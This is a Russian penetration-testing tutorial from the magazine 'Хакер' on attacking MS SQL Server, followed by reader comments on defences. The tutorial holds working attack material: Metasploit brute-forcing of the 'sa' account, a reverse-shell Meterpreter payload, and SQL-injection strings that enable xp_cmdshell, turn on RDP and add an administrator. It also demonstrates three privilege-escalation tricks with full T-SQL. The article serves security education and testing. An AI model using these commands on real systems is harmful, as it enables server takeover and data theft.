Практически ни один серьезный пентест не обходится без проверки СУБД, ведь это одна из самых популярных у злоумышленников дверей к желаемой информации и машине. В крупных проектах в качестве СУБД очень часто используется MS SQL Server. И о проверке именно его безопасности мы сегодня и поговорим. Открывать Америку не будем — опытные камрады лишь освежат свои знания, а вот для тех, кто только начинает осваивать тему, я постарался максимально подробно разложить все по пунктам.
Введение
Один из самых важных критериев надежности информационной системы — безопасность СУБД. Атаки, направленные на нее, в большинстве случаев критические, потому что могут частично либо полностью нарушить работоспособность системы. Поскольку крупные организации формировали свою инфраструктуру давным-давно и обновление на новые версии ПО вызывает у них «большие» проблемы, самыми распространенными версиями до сих пор остаются MS SQL Server 2005 и MS SQL Server 2008. Но это всего лишь статистика, и далее мы будем рассматривать общие для всех версий векторы и техники. Для удобства условно разобьем весь процесс пентеста на несколько этапов.
Как найти MS SQL
Первое, что начинает делать пентестер, — это собирать информацию о сервисах, расположенных на сервере жертвы. Самое главное, что нужно знать для поиска Microsoft SQL Server, — номера портов, которые он слушает. А слушает он порты 1433 (TCP) и 1434 (UDP). Чтобы проверить, имеется ли MS SQL на сервере жертвы, необходимо его просканировать. Для этого можно использовать Nmap cо скриптом `ms-sql-info`. Запускаться сканирование будет примерно так:
nmap -p 1433 --script=ms-sql-info 192.168.18.128
Ну а результат его выполнения представлен на рис. 1.
Рис. 1.Сканирование MS SQL при помощи Nmap
Помимо Nmap, есть отличный сканирующий модуль для Метасплоита `mssql_ping`, позволяющий также определять наличие MS SQL на атакуемом сервере:
msf> use auxilary/scanner/mssql/mssql_ping
msf auxilary(mssql_ping) > set RHOSTS 192.167.1.87
RHOSTS => 192.168.1.87
msf auxilary(mssql_ping) > run
Рис. 2. Сканирование MS SQL при помощи mssql_ping
Используя один из данных вариантов, можно быстренько определить, установлен ли на сервере MS SQL, а также узнать его версию. После чего можно переходить к следующему этапу.
Brute force
Допустим, СУБД на сервере мы обнаружили. Теперь стоит задача получить к ней доступ. И тут нас встречает первое препятствие в виде аутентификации. Вообще, MS SQL поддерживает два вида аутентификации:
- Windows Authentication — доверительное соединение, при котором SQL Server принимает учетную запись пользователя, предполагая, что она уже проверена на уровне операционной системы.
- Смешанный режим — аутентификация средствами SQL Server + Windows Authentication.
По умолчанию используется первый режим аутентификации, а смешанный режим активируется отдельно. На практике же довольно трудно встретить базу без смешанного режима — он более гибок.
Некоторые плюсы смешанного режима
- Позволяет SQL Server поддерживать более старые приложения, а также поставляемые сторонними производителями приложения, для которых необходима проверка подлинности SQL Server.
- Позволяет SQL Server поддерживать среды с несколькими операционными системами, в которых пользователи не проходят проверку подлинности домена Windows.
- Позволяет разработчикам программного обеспечения распространять свои приложения с помощью сложной иерархии разрешений, основанной на известных, заранее установленных именах входа SQL Server.
Обычно на данном этапе мы не имеем доступа в корпоративную сеть, тем самым использовать аутентификацию посредством Windows не можем. Но мы нашли открытый порт с MS SQL, значит, пробуем побрутить админскую учетку `sa`, стандартную для смешанного режима. Для автоматизации процесса используем модуль Метасплоита `mssql_login`:
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set RHOSTS 172.16.2.104
RHOSTS => 172.16.2.104
msf auxiliary(mssql_login) > set PASS_FILE /root/Desktop/pass.txt
[*] 172.16.2.104:1433 - MSSQL - Starting authentication scanner.
[*] 172.16.2.104:1433 - LOGIN FAILED: WORKSTATION\sa:admin (Incorrect: )
[*] 172.16.2.104:1433 - LOGIN FAILED: WORKSTATION\sa:qwerty (Incorrect: )
[*] 172.16.2.104:1433 - LOGIN FAILED: WORKSTATION\sa:toor (Incorrect: )
[+] 172.16.2.104:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Отлично! Пароль найден, теперь можем переходить к следующему этапу. Но что, если учетки `sa` на сервере не окажется? Тогда придется брутить и логин, для чего необходимо будет указать скрипту еще один файл, откуда их брать:
msf auxiliary(mssql_login) > set USER_FILE /root/Desktop/user.txt
WWW
Большое разнообразие словарей для брутфорса можно найти здесь.
Получение shell’а
В случае если у нас получилось сбрутить учетку `sa`, мы можем залогиниться в БД. Далее сценарий прост — включаем хранимую процедуру, позволяющую выполнять команды на уровне операционной системы, и заливаем на сервер Meterpreter shell. Крутые ребята написали для Метасплоита отличный модуль `mssql_payload`, который автоматизирует этот процесс:
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set RHOST 172.16.2.104
msf exploit(mssql_payload) > set USERNAME sa
USERNAME => sa
msf exploit(mssql_payload) > set PASSWORD root
PASSWORD => root
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 172.16.2.105
LHOST => 172.16.2.105
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (172.16.2.105:4444 -> 172.16.2.104:3987) at 2015-02-20 10:42:52 -0500
meterpreter >
Сессия Meterpreter’a создана, теперь ты имеешь полный доступ. Можешь дампить хеш админа, делать скриншоты, создавать/удалять файлы, включать/выключать мышь или клавиатуру и многое другое. Пожалуй, это самый популярный шелл, который используется при тестах на проникновение. Полный список команд Meterpreter’a можно подсмотреть здесь.
Что делать, если логин/пароль не сбрутился?
Но не обольщайся, не так часто модуль `mssql_login` будет тебя радовать: пароль админы очень редко оставляют дефолтным. В таком случае получить шелл нам поможет SQL-инъекция. Представь себе HTML-форму, в которую пользователь вводит номер статьи, и простой уязвимый запрос к БД, причем все это работает под админской учеткой `sa`:
$strSQL = “SELECT * FROM [dbo].[articles] WHERE id=$id”;
Переменная `$id` никак не фильтруется, значит, можно провести SQL-инъекцию, в которой любой запрос будет выполнен из-под админской учетки `sa`. Для того чтобы выполнять команды на уровне операционной системы, необходимо активировать хранимую процедуру `xp_cmdshell`, которая по умолчанию выключена. Нам потребуется отправить четыре запроса для ее активации:
- `10; EXEC sp_configure 'show advanced options',1;`
- `10; reconfigure;`
- `10; ‘exec sp_configure 'xp_cmdshell',1;`
- `10; reconfigure`
Системная хранимая процедура `sp_configure` позволяет просматривать, документировать, изменять и восстанавливать конфигурацию сервера. Наиболее простой способ получить доступ к серверу — включить RDP через реестр, создать пользователя с админскими правами и подключиться.
Включаем RDP:
10; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Создаем пользователя:
10; exec master.dbo.xp_cmdshell 'net user root toor /ADD'
Даем права:
10;exec master.dbo.xp_cmdshell 'net localgroup administrators root/add'
Повышение привилегий. TRUSTWORTHY
В предыдущем случае запрос к базе происходил от имени админа, и поэтому было так просто исполнять команды операционной системы. Но что делать, если мы имеем урезанную учетку, у которой не будет прав включить `xp_cmdshell`? В этом случае нам помогут хранимые процедуры и активированное свойство `TRUSTWORTHY` у базы.
Но начнем с самого начала. Для большей наглядности этого вектора опишу весь этап еще на стадии конфигурации базы и учетных записей. Создаем новую базу `YOLO`: `CREATE DATABASE YOLO;`. Создаем нового пользователя `bob` с паролем `marley`: `CREATE LOGIN bob WITH PASSWORD = 'marley';` Назначаем пользователя `bob` владельцем базы `YOLO`:
USE YOLO
ALTER LOGIN [bob] with default_database = [YOLO];
CREATE USER [bob] FROM LOGIN [bob];
EXEC sp_addrolemember [db_owner], [bob];
Затем устанавливаем свойство `TRUSTWORTHY`, которое определяет, разрешать ли объектам данной базы (представлениям, пользовательским функциям, хранимым процедурам) обращаться к объектам за пределами данной базы в режиме имперсонации: `ALTER DATABASE YOLO SET TRUSTWORTHY ON`. Логинимся в SQL Server под учеткой `bob:marley`.
Создаем хранимую процедуру для присвоения учетной записи bob привилегий sysadmin:
USE YOLO
GO
CREATE PROCEDURE sp_lvlup
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'bob','sysadmin'
GO
Убедимся, что до исполнения хранимой процедуры мы не имеем привилегий sysadmin:
SELECT is_srvrolemember('sysadmin')
результат = 0
Выполним созданную выше хранимую процедуру `sp_lvlup`:
USE YOLO
EXEC sp_lvlup
И опять проверим наши привилегии:
SELECT is_srvrolemember('sysadmin')
результат = 1
Процедура `sp_lvlup` создана для запуска от имени `OWNER`, что в данном случае является админской учетной записью `sa`. Это возможно, потому что `db_owner` создал хранимую процедуру для своей базы, а эта база сконфигурирована как надежная, то есть свойство `TRUSTWORTHY = On`. Без этого свойства не удалось бы исполнить процедуру из-за нехватки привилегий. Активированное свойство TRUSTWORTHY — это не всегда плохо. Проблемы начинаются, когда администраторы не понижают привилегии владельцам баз. В итоге учетной записи `bob` после исполнения процедуры `sp_lvlup` присвоены привилегии `sysadmin`. Чтобы посмотреть, у каких баз активировано свойство `TRUSTWORTHY`, можно воспользоваться следующим запросом:
SELECT name, database_id, is_trustworthy_on FROM sys.databases
Или для автоматизации всего процесса можно использовать модуль для Метасплоита `mssql_escalate_dbowner_sqli`:
use auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
set rhost 172.16.2.104
set rport 80
set GET_PATH /login.asp?id=1+and+1=[SQLi];--
exploit
...
[+] 172.16.2.104:80 - Success! Bob is now a sysadmin!
Повышение привилегий. User Impersonation
Следующий вектор имеет название User Impersonation. Иногда хранимым процедурам необходим доступ к внешним ресурсам, находящимся за пределами базы приложения. Чтобы это реализовать, разработчики используют привилегии `IMPERSONATE` и функцию `EXECUTE AS`, позволяющие выполнить запрос от имени другой учетной записи. Это не уязвимость как таковая, а скорее слабая конфигурация, приводящая к эскалации привилегий.
Как и в предыдущем примере, начнем разбирать суть вектора еще на стадии конфигурации. Первым делом создаем четыре учетные записи:
CREATE LOGIN User1 WITH PASSWORD = 'secret';
CREATE LOGIN User2 WITH PASSWORD = 'secret';
CREATE LOGIN User3 WITH PASSWORD = 'secret';
CREATE LOGIN User4 WITH PASSWORD = 'secret';
Затем даем пользователю `User1` привилегии исполнять запросы от имени `sa`, `User2`, `User3`:
USE master;
GRANT IMPERSONATE ON LOGIN::sa to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1];
GO
Логинимся в SQL Server под учетной записью `User1` и проверяем, применились ли привилегии исполнять запросы от других учетных записей.
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
Теперь проверим текущие привилегии:
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Результат = 0
Ну а сейчас собственно сам трюк — выполним запрос от имени `sa`, так как выше мы дали привилегии учетной записи `User1` выполнять запросы от имени `sa`:
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Результат = 1
Все в порядке, теперь можем выполнять команды от имени `sa`, а значит, можно включить хранимую процедуру `xp_cmdshell`:
EXEC sp_configure 'show advanced options',1
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
GO
INFO
Учетная запись `sysadmin` по умолчанию может выполнять запросы от имени любых других пользователей. Вывести таблицу со всеми пользователями тебе поможет запрос: `SELECT * FROM master.sys.sysusers WHERE islogin = 1`. Для выполнения запроса от имени другой учетной записи используй `EXECUTE AS LOGIN = 'AnyUser'`. Чтобы вернуться снова к предыдущей учетной записи, достаточно выполнить запрос `REVERT`.
Вот и весь фокус. Для автоматизации, как обычно, можно воспользоваться модулем Метасплоита `mssql_escalate_executeas_sqli`:
use auxiliary/admin/mssql/mssql_escalate_execute_as_sqliex
set rhost 172.16.2.104
set rport 80
set GET_PATH /login.asp?id=1+and+1=[SQLi];--
exploit
...
[+] 172.16.2.104:80 - Success! User1 is now a sysadmin!
Повышение привилегий. Хранимые процедуры, подписанные сертификатом
Для описания данного вектора создадим уязвимую хранимую процедуру, подписанную сертификатом. В отличие от предыдущих примеров, для эскалации привилегий необязательны:
- свойство `TRUSTWORTHY = On`;
- привилегии `IMPERSONATE` и функция `EXECUTE AS`;
- конфигурация хранимой процедуры с классом `WITH EXECUTE AS` для ее выполнения от имени другой учетной записи.
Создадим учетную запись с минимальными правами:
CREATE LOGIN tor WITH PASSWORD = 'loki';
GO
-- Set login’s default database
ALTER LOGIN [tor] with default_database = [master];
GO
Выключим свойство `TRUSTWORTHY`: `ALTER DATABASE master SET TRUSTWORTHY OFF`. И создадим простую хранимую процедуру `sp_xxx`, которая будет выводить столбец `name` из базы `tempdb`, а также из базы, которую ввел пользователь:
USE MASTER;
GO
CREATE PROCEDURE sp_xxx
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases where name like ''%'+ @DbName+'%'' OR name=''tempdb''';
EXECUTE(@query)
END
GO
После этого создадим ключ шифрования для базы `MASTER`:
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'secret';
GO
И сертификат:
CREATE CERTIFICATE sp_xxx_cert
WITH SUBJECT = 'To sign the sp_xxx',
EXPIRY_DATE = '2035-01-01';
GO
Следующим шагом создаем логин из сертификата `sp_xxx`:
CREATE LOGIN sp_xxx_login
FROM CERTIFICATE sp_xxx_cert
И подпишем процедуру созданным сертификатом:
ADD SIGNATURE to sp_xxx
BY CERTIFICATE sp_xxx_cert;
GO
Присвоим логину `sp_lvlup2` привилегии `sysadmin`:
EXEC master..sp_addsrvrolemember @loginame = N'sp_xxx_login', @rolename = N'sysadmin'
GO
Даем привилегии членам группы PUBLIC исполнять процедуру:
GRANT EXECUTE ON sp_xxx to PUBLIC
В итоге мы создали пользователя `tor` с минимальными правами, хранимую процедуру `sp_xxx`, которая выводит имя введенной базы, создали сертификат `sp_xxx_cert` и подписали им хранимую процедуру, а также создали логин `sp_xxx_login` из сертификата и дали ему привилегии `sysadmin`. На этом подготовительная часть закончена. Логинимся учетной записью `tor` и вызываем хранимую процедуру:
EXEC MASTER.dbo.sp_xxx 'master'
Как и положено, она вернет нам имя указанной нами БД — `master` и `tempdb` (см. рис. 3).
Рис. 3. Результат выполнения запроса EXEC MASTER.dbo.sp_xxx 'master'
Запрос вида `EXEC MASTER.dbo.sp_sqli2 'master''--'` вернет уже только `master` (см. рис. 4).
Рис .4. Результат выполнения запроса EXEC MASTER.dbo.xxx 'master''--'
Отлично. Это означает, что хранимая процедура подвержена SQL-инъекции. Проверим наши привилегии с помощью следующего запроса:
EXEC MASTER.dbo.sp_xxx 'master'';SELECT is_srvrolemember(''sysadmin'')as priv_certsp--';
Рис. 5. Проверяем наши привилегии через уязвимую хранимую процедуру
`priv_cersp=1`(см. рис. 5) означает, что мы имеем привилегии sysadmin. Выполнить команду `EXEC master..xp_cmdshell 'whoami';` не получится, потому что у учетной записи `tor` минимальные права, но если этот запрос внедрить в SQL-инъекцию, то все сработает (рис. 6).
Рис.6. Проверяем свои привилегии в системе
Что самое интересное, такой трюк будет работать в версиях 2005–2014.
Заключение
Разница во всех этих векторах весьма существенна. В некоторых случаях для достижения цели можно ограничиться включенным свойством `TRUSTWORTHY`, позволяющим использовать ресурсы данной базы объектам, находящимся вне, для того чтобы создать и исполнить хранимую процедуру, повышающую привилегии. Где-то можно выполнять хранимые процедуры от имени других учетных записей благодаря наличию привилегий `IMPERSONATE` и функции `EXECUTE AS`, а в третьих случаях важно лишь наличие SQL-инъекции, через которую можно внедрить запрос, и он будет исполнен от имени другой учетной записи. Для полного понимания нюансов и тонкостей я бы советовал проверить эти векторы на своей локальной машине.
В статье не дано исчерпывающее изложение всех векторов атак на СУБД MS SQL, но для поверхностного анализа защищенности она будет весьма полезна. Также рекомендую ознакомиться с другим вектором взлома через DB link’и, который описал Алексей Тюрин в декабрьском номере ][ (#191) в разделе Easy Hack. На этом все, благодарю за внимание и до новых встреч.
Впервые опубликовано в журнале «Хакер» от 04/2015.
Автор: Никита «ir0n» Келесис, Digital Security (@nkelesis, nikita.elkey@gmail.com)
Подпишись на «Хакер»
Комментарии (8)
tjomamokrenko
07.05.2015 13:35+3Cтатья ни о чём. Назвать надо было «проверяем, не забыли ли поменять пароль с дефолтного на нормальный» или «проверяем, не забыли ли проверить входящие данные».
kirias
08.05.2015 16:50+2Переменная `$id` никак не фильтруется, значит, можно провести SQL-инъекцию, в которой любой запрос будет выполнен из-под админской учетки `sa`. Для того чтобы выполнять команды на уровне операционной системы, необходимо активировать хранимую процедуру `xp_cmdshell`, которая по умолчанию выключена. Нам потребуется отправить четыре запроса для ее активации:
Вон оно как просто оказывается. Нашел переменную и выполнил запросы, красота!
aalebedev
Что бы этого всего не было надо соблюдать 4 очевидные вещи:
1) закрыть возможность обращаться к SQL серверу всем кроме айпи адреса с приложением. Очень часто они на одном находятся.
2) везде нормальные пароли.
3) изучить наконец SQL инъекции.
4) использовать для запроса пользователя с ограниченным числом прав (т.е. не надо давать ему доступ к другим базам, которые он не используют и прочие лишние полномочия)
nonname
Ещё добавил бы, что для MSSQL полезно вообще не давать доступа приложениям к данным напрямую, а вместо этого использовать хранимые процедуры с проверками.
WaveCut
Вредные советы все еще живы.
Часто еще советуют использовать вьюшки, это законно, но:
Пользуясь такого рода инкапсуцляцией стоит помнить, что резалт-сеты не имеют индексов, и, если вы в дальнейшем собираетесь манипулировать результатами выборок, то можно столкнуться с проблемной производительностью. А если все методы реализовывать в виде хранимух процедур, то это превращается в кошмар поддержки. Знаю не по наслышке.
nonname
Резалт сеты на то и резалт, чтобы в них уже были готовые данные, и если не хватает вьюх, на которые индексы так же можно повесить, как раз и нужны процедуры. Давая приложению доступ к данным, особенно если это OLTP, получаем огромную дыру в безопасности. Не буду спорить что это несколько накладнее в поддержке, но я думаю оно того стоит ради безопасности данных.
optimizer
вьюхи и инлайн функции — это не резалт-сеты, они в запросах раскрываются и оптимизатор уже может воспользоваться индексами исходных таблиц. А вот с мультистейтмент-функциями так уже не получается
WaveCut
Спасибо за информацию. Возможно я просто напросто отстал от прогресса MS SQL Server и мой опыт несколько устарел :-)
Проблема с вьюхами у нас была на практике. Толи 2005, толи 2008 сервер.